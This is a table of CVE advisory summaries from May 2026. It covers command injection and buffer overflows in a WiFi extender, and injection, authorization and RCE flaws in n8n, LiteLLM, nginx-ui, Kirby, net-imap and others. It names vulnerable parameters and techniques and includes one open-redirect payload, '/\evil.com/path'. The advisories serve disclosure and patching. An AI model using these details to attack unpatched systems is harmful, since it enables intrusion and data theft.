| Shenzhen Yipu Commercial and Trading Co., Ltd--WDR201A WiFi Extender | WDR201A WiFi Extender (HW V2.1, FW LFMZX28040922V1.02) contains an OS command injection vulnerability in the wireless.cgi binary that allow unauthenticated remote attackers to execute arbitrary shell commands by injecting malicious input into the sz11gChannel or PIN POST parameters. Attackers can exploit unsanitized parameter handling in the set_wifi_basic and set_wifi_do_wps functions to achieve remote code execution without authentication. | 2026-05-04 | not yet calculated | CVE-2026-41922 | https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/ai-assisted-research/cybersecurity/cve/2026/05/04/Teaching_the_Machine_Where_to_Look.html https://www.made-in-china.com/showroom/yeapook/#:~:text=Established%20in%202015.%2CDistrict%2C%20Shenzhen%2C%20Guangdong%2C%20China https://www.vulncheck.com/advisories/wdr201a-wifi-extender-os-command-injection-via-wireless-cgi |
| Shenzhen Yipu Commercial and Trading Co., Ltd--WDR201A WiFi Extender | WDR201A WiFi Extender (HW V2.1, FW LFMZX28040922V1.02) contains an OS command injection vulnerability in the internet.cgi binary that allows unauthenticated remote attackers to execute arbitrary shell commands by injecting malicious input into the gateway POST parameter. Attackers can exploit unsanitized parameter concatenation in the set_add_routing function to inject shell commands that are executed via popen() with partial output reflected in the HTTP response. | 2026-05-04 | not yet calculated | CVE-2026-41923 | https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/ai-assisted-research/cybersecurity/cve/2026/05/04/Teaching_the_Machine_Where_to_Look.html https://www.made-in-china.com/showroom/yeapook/#:~:text=Established%20in%202015.%2CDistrict%2C%20Shenzhen%2C%20Guangdong%2C%20China https://www.vulncheck.com/advisories/wdr201a-wifi-extender-os-command-injection-via-internet-cgi |
| Shenzhen Yipu Commercial and Trading Co., Ltd--WDR201A WiFi Extender | WDR201A WiFi Extender (HW V2.1, FW LFMZX28040922V1.02) contains an OS command injection vulnerability in the makeRequest.cgi binary that allows unauthenticated remote attackers to execute arbitrary shell commands by injecting malicious input into the set_time or StartSniffer functions. Attackers can craft a POST request with specially crafted ampersand-delimited parameters to bypass input sanitization and execute commands with a maximum length of 31 bytes through the date command or channel parameter processing. | 2026-05-04 | not yet calculated | CVE-2026-41924 | https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/ai-assisted-research/cybersecurity/cve/2026/05/04/Teaching_the_Machine_Where_to_Look.html https://www.made-in-china.com/showroom/yeapook/#:~:text=Established%20in%202015.%2CDistrict%2C%20Shenzhen%2C%20Guangdong%2C%20China https://www.vulncheck.com/advisories/wdr201a-wifi-extender-os-command-injection-via-makerequest-cgi |
| Shenzhen Yipu Commercial and Trading Co., Ltd--WDR201A WiFi Extender | WDR201A WiFi Extender (HW V2.1, FW LFMZX28040922V1.02) contains an OS command injection vulnerability in the adm.cgi binary's reboot_time function that allows unauthenticated remote attackers to execute arbitrary shell commands by injecting malicious input into the reboot_time POST parameter. Attackers can send a crafted request with shell metacharacters in the reboot_time parameter when reboot_enabled=1 to achieve remote code execution. | 2026-05-04 | not yet calculated | CVE-2026-41925 | https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/ai-assisted-research/cybersecurity/cve/2026/05/04/Teaching_the_Machine_Where_to_Look.html https://www.made-in-china.com/showroom/yeapook/#:~:text=Established%20in%202015.%2CDistrict%2C%20Shenzhen%2C%20Guangdong%2C%20China https://www.vulncheck.com/advisories/wdr201a-wifi-extender-os-command-injection-via-adm-cgi-reboot-time |
| Shenzhen Yipu Commercial and Trading Co., Ltd--WDR201A WiFi Extender | WDR201A WiFi Extender (HW V2.1, FW LFMZX28040922V1.02) contains an OS command injection vulnerability in the firewall.cgi binary across five request handlers that apply insufficient input validation. Attackers can inject arbitrary shell commands through vulnerable parameters like websURLFilter, websHostFilter, portForward, singlePortForward, and ipportFilter using subshell syntax or unfiltered parameters, with payloads persisting in NVRAM and re-executing on every subsequent firewall.cgi request. | 2026-05-04 | not yet calculated | CVE-2026-41926 | https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/ai-assisted-research/cybersecurity/cve/2026/05/04/Teaching_the_Machine_Where_to_Look.html https://www.made-in-china.com/showroom/yeapook/#:~:text=Established%20in%202015.%2CDistrict%2C%20Shenzhen%2C%20Guangdong%2C%20China https://www.vulncheck.com/advisories/wdr201a-wifi-extender-os-command-injection-via-firewall-cgi |
| Shenzhen Yipu Commercial and Trading Co., Ltd--WDR201A WiFi Extender | WDR201A WiFi Extender (HW V2.1, FW LFMZX28040922V1.02) contains a stack-based buffer overflow vulnerability in the firewall.cgi and makeRequest.cgi binaries that allows unauthenticated attackers to overwrite the saved return address by sending a POST request with a Content-Length header exceeding 512 bytes. Attackers can exploit insufficient length validation in the fgets() call to achieve arbitrary code execution through return-oriented programming or return-to-libc techniques. | 2026-05-04 | not yet calculated | CVE-2026-41927 | https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/ai-assisted-research/cybersecurity/cve/2026/05/04/Teaching_the_Machine_Where_to_Look.html https://www.made-in-china.com/showroom/yeapook/#:~:text=Established%20in%202015.%2CDistrict%2C%20Shenzhen%2C%20Guangdong%2C%20China https://www.vulncheck.com/advisories/wdr201a-wifi-extender-stack-based-buffer-overflow-via-firewall-cgi |
| Apache Software Foundation--Apache OpenNLP | Arbitrary Class Instantiation via Model Manifest in Apache OpenNLP ExtensionLoader Versions Affected: before 2.5.9, before 3.0.0-M3 Description: The ExtensionLoader.instantiateExtension(Class, String) method loads a class by its fully-qualified name via Class.forName() and invokes its no-arg constructor, with the class name sourced from the manifest.properties entry of a model archive. The existing isAssignableFrom check correctly rejects classes that are not subtypes of the expected extension interface (BaseToolFactory for factory=, ArtifactSerializer for serializer-class-*), but the check runs after Class.forName() has already loaded and initialized the named class. Class.forName() with default initialization semantics executes the target class's static initializer before returning, so an attacker who can supply a crafted model archive can cause the static initializer of any class on the classpath to run during model loading, regardless of whether that class passes the subsequent type check. Exploitation requires a class with attacker-useful side effects in its static initializer (for example, JNDI lookup, outbound network I/O, or filesystem access) to be present on the classpath, so this is not a drop-in remote code execution; however, the attack surface grows as third-party model distribution becomes more common (community model repositories, Hugging Face-style sharing), where users routinely load model files from origins they do not control. A secondary, narrower vector affects deployments that ship legitimate BaseToolFactory or ArtifactSerializer subclasses with side-effecting no-arg constructors: a malicious manifest can name such a class and force its constructor to run during model load. Mitigation: * 2.x users should upgrade to 2.5.9. * 3.x users should upgrade to 3.0.0-M3. Note: The fix introduces a package-prefix allowlist that is consulted before Class.forName() is invoked, so the static initializer of a disallowed class is never executed. Classes under the opennlp. prefix remain permitted by default. Deployments that load models referencing factories or serializers outside opennlp.* must opt those packages in, either programmatically via ExtensionLoader.registerAllowedPackage(String) before the first model load, or by setting the OPENNLP_EXT_ALLOWED_PACKAGES system property to a comma-separated list of allowed package prefixes. Users who cannot upgrade immediately should ensure that all model files are sourced from trusted origins and should audit their classpath for classes with side-effecting static initializers or constructors, particularly any that perform JNDI lookups, network requests, or filesystem operations during class initialization. | 2026-05-04 | not yet calculated | CVE-2026-42027 | https://lists.apache.org/thread/ltlo4powjfc0w2w2yyl1o5tc7q1gcb2y |
| getkirby--kirby | Kirby is an open-source content management system. Prior to versions 4.9.0 and 5.4.0, the system API endpoint leaks license data and installed version to authenticated users. This issue has been patched in versions 4.9.0 and 5.4.0. | 2026-05-09 | not yet calculated | CVE-2026-42051 | https://github.com/getkirby/kirby/security/advisories/GHSA-x68m-c7jf-2572 https://github.com/getkirby/kirby/releases/tag/4.9.0 https://github.com/getkirby/kirby/releases/tag/5.4.0 |
| beetbox--beets | Beets is the media library management system. Prior to version 2.10.0, the bundled web UI uses Underscore template interpolation mode <%= ... %> for untrusted metadata fields. In this runtime, <%= ... %> is raw insertion and HTML escaping is only performed by <%- ... %>. Rendered output is then inserted with .html(...), allowing attacker-controlled markup to become active DOM. This issue has been patched in version 2.10.0. | 2026-05-04 | not yet calculated | CVE-2026-42052 | https://github.com/beetbox/beets/security/advisories/GHSA-3gxm-wfjx-m847 https://github.com/beetbox/beets/releases/tag/v2.10.0 |
| getkirby--kirby | Kirby is an open-source content management system. Prior to versions 4.9.0 and 5.4.0, read access to site, user and role information is not gated by permissions. This issue has been patched in versions 4.9.0 and 5.4.0. | 2026-05-09 | not yet calculated | CVE-2026-42069 | https://github.com/getkirby/kirby/security/advisories/GHSA-2h7v-4372-f6x2 https://github.com/getkirby/kirby/releases/tag/4.9.0 https://github.com/getkirby/kirby/releases/tag/5.4.0 |
| getkirby--kirby | Kirby is an open-source content management system. Prior to versions 4.9.0 and 5.4.0, `pages.access/list` and `files.access/list` permissions are not consistently checked in the Panel and REST API. This issue has been patched in versions 4.9.0 and 5.4.0. | 2026-05-09 | not yet calculated | CVE-2026-42137 | https://github.com/getkirby/kirby/security/advisories/GHSA-85x2-r8xv-ww8c https://github.com/getkirby/kirby/releases/tag/4.9.0 https://github.com/getkirby/kirby/releases/tag/5.4.0 |
| langgenius--dify | Dify is an open-source LLM app development platform. Prior to version 1.13.1, using the method POST /api/files/upload, any unauthenticated user can upload an SVG file with XSS. The method POST /v1/files/upload, which requires authentication through the application API, is also vulnerable. This issue has been patched in version 1.13.1. | 2026-05-04 | not yet calculated | CVE-2026-42138 | https://github.com/langgenius/dify/security/advisories/GHSA-cg94-8v83-7hjj https://github.com/langgenius/dify/releases/tag/1.13.1 |
| sovity--dataspace-portal | Data Space Portal is an open-source Software as a Service (SaaS) solution designed to streamline Dataspace management. From version 2.1.1 to before version 7.3.2, there is insufficient authorization in the dataspace-portal backend regarding self-registered "PENDING" organization / user accounts. This issue has been patched in version 7.3.2. | 2026-05-08 | not yet calculated | CVE-2026-42160 | https://github.com/sovity/dataspace-portal/security/advisories/GHSA-989g-wpfv-6vxx https://github.com/sovity/dataspace-portal/releases/tag/v7.3.2 |
| getkirby--kirby | Kirby is an open-source content management system. Prior to versions 4.9.0 and 5.4.0, user avatar creation, replacement and deletion are not gated by user update permissions. This issue has been patched in versions 4.9.0 and 5.4.0. | 2026-05-09 | not yet calculated | CVE-2026-42174 | https://github.com/getkirby/kirby/security/advisories/GHSA-39cp-6679-8xv2 https://github.com/getkirby/kirby/releases/tag/4.9.0 https://github.com/getkirby/kirby/releases/tag/5.4.0 |
| argoproj--argo-workflows | Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. From version 4.0.0 to before version 4.0.5, a nil pointer dereference in server/auth/gatekeeper.go rbacAuthorization() causes a panic (denial of service) for SSO users whose claims match a namespace-level RBAC rule but not an SSO-namespace rule, when SSO_DELEGATE_RBAC_TO_NAMESPACE=true. This issue has been patched in version 4.0.5. | 2026-05-09 | not yet calculated | CVE-2026-42183 | https://github.com/argoproj/argo-workflows/security/advisories/GHSA-p4gq-3vxj-f4jq https://github.com/argoproj/argo-workflows/commit/c4cc17d0c034fa9a9cc01ef1af6c8016c93071d4 https://github.com/argoproj/argo-workflows/releases/tag/v4.0.5 |
| BerriAI--litellm | LiteLLM is a proxy server (AI Gateway) to call LLM APIs in OpenAI (or native) format. From version 1.80.5 to before version 1.83.7, the POST /prompts/test endpoint accepted user-supplied prompt templates and rendered them without sandboxing. A crafted template could run arbitrary code inside the LiteLLM Proxy process. The endpoint only checks that the caller presents a valid proxy API key, so any authenticated user could reach it. Depending on how the proxy is deployed, this could expose secrets in the process environment (such as provider API keys or database credentials) and allow commands to be run on the host. This issue has been patched in version 1.83.7. | 2026-05-08 | not yet calculated | CVE-2026-42203 | https://github.com/BerriAI/litellm/security/advisories/GHSA-xqmj-j6mv-4862 https://github.com/BerriAI/litellm/releases/tag/v1.83.7-stable |
| roadiz--core-bundle-dev-app | Roadiz is a polymorphic content management system based on a node system. Prior to versions 2.3.43, 2.5.45, 2.6.31, and 2.7.18, the roadiz/openid package generates an OIDC nonce in OAuth2LinkGenerator::generate() and includes it in the authorization request sent to the identity provider, but never stores it and never validates it on the callback. The OpenIdJwtConfigurationFactory validation chain does not include a nonce constraint, and OpenIdAuthenticator::authenticate() never checks the nonce claim in the returned ID token against a stored value. This issue has been patched in versions 2.3.43, 2.5.45, 2.6.31, and 2.7.18. | 2026-05-08 | not yet calculated | CVE-2026-42206 | https://github.com/roadiz/core-bundle-dev-app/security/advisories/GHSA-3gx8-q682-38mx |
| BerriAI--litellm | LiteLLM is a proxy server (AI Gateway) to call LLM APIs in OpenAI (or native) format. From version 1.81.16 to before version 1.83.7, a database query used during proxy API key checks mixed the caller-supplied key value into the query text instead of passing it as a separate parameter. An unauthenticated attacker could send a specially crafted Authorization header to any LLM API route (for example POST /chat/completions) and reach this query through the proxy's error-handling path. An attacker could read data from the proxy's database and may be able to modify it, leading to unauthorised access to the proxy and the credentials it manages. This issue has been patched in version 1.83.7. | 2026-05-08 | not yet calculated | CVE-2026-42208 | https://github.com/BerriAI/litellm/security/advisories/GHSA-r75f-5x8p-qvmc https://github.com/BerriAI/litellm/releases/tag/v1.83.7-stable |
| anzory--SolidCAM-GPPL-IDE | SolidCAM-GPPL-IDE is an unofficial, independently developed extension, Postprocessor IDE for SolidCAM. From version 1.0.0 to before version 1.0.2, Opening a .gpp file in the SolidCAM Postprocessor IDE extension causes the language server to parse a companion .vmid file from the same directory (naming convention: foo.gpp to foo.vmid). The VMID parser called XDocument.Load(path) without any XmlReaderSettings, inheriting the framework defaults which in .NET 8 allow DTD processing. A malicious .vmid file could therefore: disclose local files via external entity references, exhaust memory via recursive entity expansion, and cause denial of service via oversized or deeply nested XML. This issue has been patched in version 1.0.2. | 2026-05-08 | not yet calculated | CVE-2026-42212 | https://github.com/anzory/SolidCAM-GPPL-IDE/security/advisories/GHSA-92vg-f4fq-fxm9 https://github.com/anzory/SolidCAM-GPPL-IDE/commit/9d0ba808afd143ede448026a5dc681bfdc5c138d https://github.com/anzory/SolidCAM-GPPL-IDE/blob/master/CHANGELOG.md#102--2026-04-20 https://github.com/anzory/SolidCAM-GPPL-IDE/releases/tag/v1.0.2 |
| anzory--SolidCAM-GPPL-IDE | SolidCAM-GPPL-IDE is an unofficial, independently developed extension, Postprocessor IDE for SolidCAM. From version 1.0.0 to before version 1.0.2, the inc "filename" directive in GPPL postprocessor files is resolved by GpplDocumentLinkHandler into a clickable link (VS Code textDocument/documentLink). The handler accepted arbitrary paths - absolute, relative with parent-directory segments (..\..\..\), UNC (\\server\share\), and arbitrary subfolders - and called File.Exists on each to decide whether to render the link. Two distinct attack surfaces resulted: information disclosure via File.Exists probing and NTLM hash leak via UNC path probing. This issue has been patched in version 1.0.2. | 2026-05-08 | not yet calculated | CVE-2026-42213 | https://github.com/anzory/SolidCAM-GPPL-IDE/security/advisories/GHSA-xvpx-9p39-g62m https://github.com/anzory/SolidCAM-GPPL-IDE/commit/9d0ba808afd143ede448026a5dc681bfdc5c138d https://github.com/anzory/SolidCAM-GPPL-IDE/releases/tag/v1.0.2 |
| AcademySoftwareFoundation--openexr | OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From versions 3.0.0 to before 3.2.9, 3.3.0 to before 3.3.11, and 3.4.0 to before 3.4.11, IDManifest::init() reconstructs strings from a prefix-compressed representation. If the previous string is longer than 255 bytes, the next string is expected to begin with a 2-byte prefix length. The code reads stringList[i][0] and stringList[i][1] without checking that the current string has at least two bytes. This issue has been patched in versions 3.2.9, 3.3.11, and 3.4.11. | 2026-05-07 | not yet calculated | CVE-2026-42216 | https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-65j8-95g9-jgj4 |
| AcademySoftwareFoundation--openexr | OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From versions 3.0.0 to before 3.2.9, 3.3.0 to before 3.3.11, and 3.4.0 to before 3.4.11, readVariableLengthInteger() decodes a variable-length integer from untrusted EXR input without bounding the shift count. After enough continuation bytes, the code executes a left shift by 70 on a 64-bit value, which is undefined behavior. This issue has been patched in versions 3.2.9, 3.3.11, and 3.4.11. | 2026-05-07 | not yet calculated | CVE-2026-42217 | https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-3c67-4wwp-w52m https://github.com/AcademySoftwareFoundation/openexr/pull/2378 https://github.com/AcademySoftwareFoundation/openexr/commit/21eaa33bcbbb0c83a5fc42f6b6d65b70a996e63c |
| pjsip--pjproject | PJSIP is a free and open source multimedia communication library written in C. Prior to version 2.17, on GnuTLS builds, the SIP TLS transport (sip_transport_tls) can accept connections with invalid or untrusted certificates even when the application explicitly enables certificate verification via verify_server = PJ_TRUE or verify_client = PJ_TRUE. This issue has been patched in version 2.17. | 2026-05-07 | not yet calculated | CVE-2026-42225 | https://github.com/pjsip/pjproject/security/advisories/GHSA-x2fv-6j6c-pxmx https://github.com/pjsip/pjproject/commit/ef684252bb62b0716675b6e99ad7fe4c90e28920 https://github.com/pjsip/pjproject/releases/tag/2.17 |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to versions 1.123.33 and 2.17.5, the dynamic-node-parameters endpoints did not verify whether the authenticated caller was authorized to use a supplied credential reference. An authenticated user with access to a shared workflow could supply a foreign credential ID in the request body, causing the backend to decrypt and use that credential in a helper execution path where the caller also controls the destination URL. This allowed the caller to force the backend to authenticate against attacker-controlled infrastructure using a credential belonging to another user, effectively exfiltrating a reusable API key. The issue is not limited to any single node type; any node that resolves credentials dynamically through these endpoints may be affected. This issue has been patched in versions 1.123.33, 2.17.5, and 2.18.0. | 2026-05-04 | not yet calculated | CVE-2026-42226 | https://github.com/n8n-io/n8n/security/advisories/GHSA-r4v6-9fqc-w5jr |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to versions 1.123.32, 2.17.4, and 2.18.1, an authenticated user with a valid API key scoped to variable:list could read variables from projects they are not a member of by supplying an arbitrary projectId query parameter to the public API variables endpoint. The handler queried the variables repository directly without enforcing project membership checks, bypassing the authorization-aware service layer used by the internal enterprise controller. If variables were misused to store sensitive information such as credentials or tokens, they should be rotated immediately. This issue only affects licensed enterprise or team deployments with multiple projects and the variables feature enabled. This issue has been patched in versions 1.123.32, 2.17.4, and 2.18.1. | 2026-05-04 | not yet calculated | CVE-2026-42227 | https://github.com/n8n-io/n8n/security/advisories/GHSA-756q-gq9h-fp22 |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to versions 1.123.32, 2.17.4, and 2.18.1, the /chat WebSocket endpoint used by the Chat Trigger node's Hosted Chat feature did not verify that an incoming connection was authorized to interact with the target execution. An unauthenticated remote attacker who could identify a valid execution ID for a workflow in a waiting state could attach to that execution, receive the pending prompt intended for the legitimate user, and submit arbitrary input to resume or influence downstream workflow behavior. This issue has been patched in versions 1.123.32, 2.17.4, and 2.18.1. | 2026-05-04 | not yet calculated | CVE-2026-42228 | https://github.com/n8n-io/n8n/security/advisories/GHSA-f77h-j2v7-g6mw |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to versions 1.123.32, 2.17.4, and 2.18.1, a flaw in the SeaTable node's row:search and row:get operations allowed user-controlled input to be concatenated directly into SQL query strings without escaping or parameterization. In workflows where external user input is passed via expressions into the SeaTable node's search or row retrieval parameters, an attacker could manipulate the constructed query to retrieve unintended rows from the connected SeaTable base, bypassing row-level filtering logic implemented in the workflow. This issue has been patched in versions 1.123.32, 2.17.4, and 2.18.1. | 2026-05-04 | not yet calculated | CVE-2026-42229 | https://github.com/n8n-io/n8n/security/advisories/GHSA-mp4j-h6gh-f6mp |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to versions 1.123.32, 2.17.4, and 2.18.1, the /mcp-oauth/register endpoint accepted OAuth client registrations without authentication, allowing arbitrary redirect_uri values to be registered. When a user denies the MCP OAuth consent dialog, the handleDeny handler redirects the user to the registered redirect_uri without validation, enabling an open redirect to an attacker-controlled URL. An attacker can craft a phishing link and send it to a victim; if the victim clicks "Deny" on the consent page, they are silently redirected to an external site. This issue has been patched in versions 1.123.32, 2.17.4, and 2.18.1. | 2026-05-04 | not yet calculated | CVE-2026-42230 | https://github.com/n8n-io/n8n/security/advisories/GHSA-f6x8-65q6-j9m9 |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to versions 1.123.32, 2.17.4, and 2.18.1, a flaw in the xml2js library used to parse XML request bodies in n8n's webhook handler allowed prototype pollution via a crafted XML payload. An authenticated user with permission to create or modify workflows could exploit this to pollute the JavaScript object prototype and, by chaining the pollution with the Git node's SSH operations, achieve remote code execution on the n8n host. This issue has been patched in versions 1.123.32, 2.17.4, and 2.18.1. | 2026-05-04 | not yet calculated | CVE-2026-42231 | https://github.com/n8n-io/n8n/security/advisories/GHSA-q5f4-99jv-pgg5 |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to versions 1.123.32, 2.17.4, and 2.18.1, an authenticated user with permission to create or modify workflows could achieve global prototype pollution via the XML Node leading to RCE when combined with other nodes exploiting the prototype pollution. This issue has been patched in versions 1.123.32, 2.17.4, and 2.18.1. | 2026-05-04 | not yet calculated | CVE-2026-42232 | https://github.com/n8n-io/n8n/security/advisories/GHSA-hqr4-h3xv-9m3r |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to versions 1.123.32, 2.17.4, and 2.18.1, a flaw in the Oracle Database node's select operation allowed user-controlled input passed into the Limit field via expressions to be interpolated directly into the SQL query without sanitization or parameterization. In workflows where external input is passed into the Limit field (e.g., from a webhook), an attacker could inject arbitrary SQL and exfiltrate data from the connected Oracle database. This issue has been patched in versions 1.123.32, 2.17.4, and 2.18.1. | 2026-05-04 | not yet calculated | CVE-2026-42233 | https://github.com/n8n-io/n8n/security/advisories/GHSA-r6jc-mpqw-m755 |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to versions 1.123.32, 2.17.4, and 2.18.1, an authenticated user with permission to create or modify workflows containing a Python Code Node could escape the sandbox and achieve arbitrary code execution on the task runner container. This issue only affects instances where the Python Task Runner is enabled. This issue has been patched in versions 1.123.32, 2.17.4, and 2.18.1. | 2026-05-04 | not yet calculated | CVE-2026-42234 | https://github.com/n8n-io/n8n/security/advisories/GHSA-44v6-jhgm-p3m4 |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to versions 1.123.32, 2.17.4, and 2.18.1, an unauthenticated attacker could register a malicious MCP OAuth client with a crafted client_name. If a victim user authorized the OAuth consent dialog and a second user subsequently revoked that access, a toast notification would render the injected script. Clicking the link would execute arbitrary JavaScript in the victim's authenticated n8n browser session, enabling credential and session token theft, workflow manipulation, or privilege escalation. This issue has been patched in versions 1.123.32, 2.17.4, and 2.18.1. | 2026-05-04 | not yet calculated | CVE-2026-42235 | https://github.com/n8n-io/n8n/security/advisories/GHSA-537j-gqpc-p7fq |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to versions 1.123.32, 2.17.4, and 2.18.1, the MCP OAuth client registration endpoint accepted unauthenticated requests and stored client data without adequate resource controls. An unauthenticated remote attacker could exhaust server memory resources by sending large registration payloads, rendering the n8n instance unavailable. The MCP enable/disable toggle gates MCP access but did not restrict client registrations, meaning the endpoint is reachable regardless of whether MCP access is enabled on the instance. This issue has been patched in versions 1.123.32, 2.17.4, and 2.18.1. | 2026-05-04 | not yet calculated | CVE-2026-42236 | https://github.com/n8n-io/n8n/security/advisories/GHSA-49m9-pgww-9vq6 |
| n8n-io--n8n | n8n is an open source workflow automation platform. Prior to versions 1.123.32, 2.17.4, and 2.18.1, the fix for GHSA-f3f2-mcxc-pwjx did not cover the Snowflake node or the legacy MySQL v1 node. Both nodes construct SQL queries by directly interpolating user-controlled table names, column names, and update keys into query strings without identifier escaping, enabling SQL injection against the connected database. This issue has been patched in versions 1.123.32, 2.17.4, and 2.18.1. | 2026-05-04 | not yet calculated | CVE-2026-42237 | https://github.com/n8n-io/n8n/security/advisories/GHSA-hp3c-vfpm-q4f7 |
| 0xJacky--nginx-ui | Nginx UI is a web user interface for the Nginx web server. Prior to version 2.3.8, nginx-ui exposes a backup restore endpoint (POST /api/restore) that is completely unauthenticated during the first 10 minutes after process startup on any fresh installation. An unauthenticated remote attacker can upload a crafted backup archive that overwrites the application's configuration file (app.ini) and SQLite database. Because the attacker controls the restored app.ini, they can inject an arbitrary OS command into the TestConfigCmd setting. After the application automatically restarts to apply the restored config, a single follow-up request triggers that command as the user running nginx-ui - typically root in Docker deployments. This issue has been patched in version 2.3.8. | 2026-05-04 | not yet calculated | CVE-2026-42238 | https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-4pvg-prr3-9cxr https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8 |
| ruby--net-imap | Net::IMAP implements Internet Message Access Protocol (IMAP) client functionality in Ruby. Prior to versions 0.4.24, 0.5.14, and 0.6.4, Net::IMAP::ResponseReader has quadratic time complexity when reading large responses containing many string literals. A hostile server can send responses which are crafted to exhaust the client's CPU for a denial of service attack. This issue has been patched in versions 0.4.24, 0.5.14, and 0.6.4. | 2026-05-09 | not yet calculated | CVE-2026-42245 | https://github.com/ruby/net-imap/security/advisories/GHSA-q2mw-fvj9-vvcw https://github.com/ruby/net-imap/commit/6091f7d6b1f3514cafbfe39c76f2b5d73de3ca96 https://github.com/ruby/net-imap/commit/88d95231fc8afef11c1f074453f7d75b68c9dfda https://github.com/ruby/net-imap/commit/de685f91a4a4cc75eb80da898c2bf8af08d34819 https://github.com/ruby/net-imap/releases/tag/v0.4.24 https://github.com/ruby/net-imap/releases/tag/v0.5.14 https://github.com/ruby/net-imap/releases/tag/v0.6.4 |
| ruby--net-imap | Net::IMAP implements Internet Message Access Protocol (IMAP) client functionality in Ruby. Prior to versions 0.3.10, 0.4.24, 0.5.14, and 0.6.4, a man-in-the-middle attacker can cause Net::IMAP#starttls to return "successfully", without starting TLS. This issue has been patched in versions 0.3.10, 0.4.24, 0.5.14, and 0.6.4. | 2026-05-09 | not yet calculated | CVE-2026-42246 | https://github.com/ruby/net-imap/security/advisories/GHSA-vcgp-9326-pqcp https://github.com/ruby/net-imap/commit/0ede4c40b1523dfeaf95777b2678e54cc0fd9618 https://github.com/ruby/net-imap/commit/24a4e770b43230286a05aa2a9746cdbb3eb8485e https://github.com/ruby/net-imap/commit/97e2488fb5401a1783bddd959dde007d9fbce42c https://github.com/ruby/net-imap/commit/f79d35bf5833f186e81044c57c843eda30c873da https://github.com/ruby/net-imap/releases/tag/v0.3.10 https://github.com/ruby/net-imap/releases/tag/v0.4.24 https://github.com/ruby/net-imap/releases/tag/v0.5.14 |
| ruby--net-imap | Net::IMAP implements Internet Message Access Protocol (IMAP) client functionality in Ruby. From versions 0.4.0 to before 0.4.24, 0.5.0 to before 0.5.14, and 0.6.0 to before 0.6.4, when authenticating a connection with SCRAM-SHA1 or SCRAM-SHA256, a hostile server can perform a computational denial-of-service attack on the client process by sending a big iteration count value. This issue has been patched in versions 0.4.24, 0.5.14, and 0.6.4. | 2026-05-09 | not yet calculated | CVE-2026-42256 | https://github.com/ruby/net-imap/security/advisories/GHSA-87pf-fpwv-p7m7 https://github.com/ruby/net-imap/commit/158d0b505074397cdb5ceb58935e42dd2bcfa612 https://github.com/ruby/net-imap/commit/808001bc45c06f7297a7e96d341279e041a7f7f4 https://github.com/ruby/net-imap/commit/99f59eab6064955a23debd95410263ad144df758 https://github.com/ruby/net-imap/releases/tag/v0.4.24 https://github.com/ruby/net-imap/releases/tag/v0.5.14 https://github.com/ruby/net-imap/releases/tag/v0.6.4 |
| ruby--net-imap | Net::IMAP implements Internet Message Access Protocol (IMAP) client functionality in Ruby. Prior to versions 0.4.24, 0.5.14, and 0.6.4, several Net::IMAP commands accept a raw string argument that is sent to the server without validation or escaping. If this string is derived from user-controlled input, it may contain contain CRLF sequences, which an attacker can use to inject arbitrary IMAP commands. This issue has been patched in versions 0.4.24, 0.5.14, and 0.6.4. | 2026-05-09 | not yet calculated | CVE-2026-42257 | https://github.com/ruby/net-imap/security/advisories/GHSA-hm49-wcqc-g2xg https://github.com/ruby/net-imap/releases/tag/v0.4.24 https://github.com/ruby/net-imap/releases/tag/v0.5.14 https://github.com/ruby/net-imap/releases/tag/v0.6.4 |
| ruby--net-imap | Net::IMAP implements Internet Message Access Protocol (IMAP) client functionality in Ruby. Prior to versions 0.4.24, 0.5.14, and 0.6.4, symbol arguments to commands are vulnerable to a CRLF Injection / IMAP Command injection via Symbol arguments passed to IMAP commands. This issue has been patched in versions 0.4.24, 0.5.14, and 0.6.4. | 2026-05-09 | not yet calculated | CVE-2026-42258 | https://github.com/ruby/net-imap/security/advisories/GHSA-75xq-5h9v-w6px https://github.com/ruby/net-imap/releases/tag/v0.4.24 https://github.com/ruby/net-imap/releases/tag/v0.5.14 https://github.com/ruby/net-imap/releases/tag/v0.6.4 |
| saltcorn--saltcorn | Saltcorn is an extensible, open source, no-code database application builder. Prior to versions 1.4.6, 1.5.6, and 1.6.0-beta.5, Saltcorn validates the post-login dest parameter with a string check that only blocks :/ and //. Because all WHATWG-compliant browsers normalise backslashes (\) to forward slashes (/) for special schemes, a payload such as /\evil.com/path slips through is_relative_url(), is emitted unchanged in the HTTP Location header, and causes the browser to navigate cross-origin to an attacker-controlled domain. The bug is reachable on a default install and only requires a victim who can be tricked into logging in via a crafted Saltcorn URL. This issue has been patched in versions 1.4.6, 1.5.6, and 1.6.0-beta.5. | 2026-05-07 | not yet calculated | CVE-2026-42259 | https://github.com/saltcorn/saltcorn/security/advisories/GHSA-f3g8-9xv5-77gv |
